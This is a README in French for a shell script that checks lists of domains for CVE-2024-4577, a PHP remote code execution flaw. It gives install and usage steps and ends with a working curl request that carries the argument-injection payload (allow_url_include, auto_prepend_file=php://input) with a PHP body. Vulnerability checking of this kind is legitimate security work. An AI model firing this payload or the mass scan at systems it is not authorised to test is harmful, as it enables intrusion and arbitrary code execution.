
Ce script est conçu pour vérifier la vulnérabilité décrite par CVE-2024-4577, qui consiste à exploiter certaines configurations PHP pour exécuter du code arbitraire à distance. Il envoie une requête POST à des points de terminaison spécifiés sur une liste de domaines et vérifie si la réponse indique une vulnérabilité.
Installer GNU Parallel :
sudo apt-get install parallel
Cloner le dépôt : Clonez ce dépôt sur votre machine locale à l'aide de Git :
git clone https://github.com/Yukiioz/CVE-2024-4577.git
Accéder au dépôt : Accédez au répertoire cloné :
cd CVE-2024-4577
Préparer la liste des domaines : Créez un fichier texte contenant une liste de domaines à vérifier. Chaque domaine doit être sur une nouvelle ligne. Par exemple :
https://example1.com
https://example2.com
https://example3.com
Exécuter le script :
Exécutez le script CVE-2024-4577.sh en passant le chemin du fichier de liste de domaines comme argument :
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
Examiner la sortie :
Le script affichera des informations de progression lors de la vérification de chaque domaine. Si un domaine est détecté comme vulnérable, il sera surligné en rouge. Le script exportera également une liste des domaines vulnérables dans un fichier nommé vulnerable_domains.txt.
vulnerable_domains.txtLe script exporte une liste des domaines vulnérables dans un fichier nommé vulnerable_domains.txt. Ce fichier contient une simple liste des domaines vulnérables, chaque domaine étant sur une nouvelle ligne. Pour confirmation manuelle supplémentaire, utilisez la commande curl pour envoyer une requête POST au point de terminaison cible sur le domaine. Remplacez https://dev.example.com/test.php par le point de terminaison réel sur le domaine cible.
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"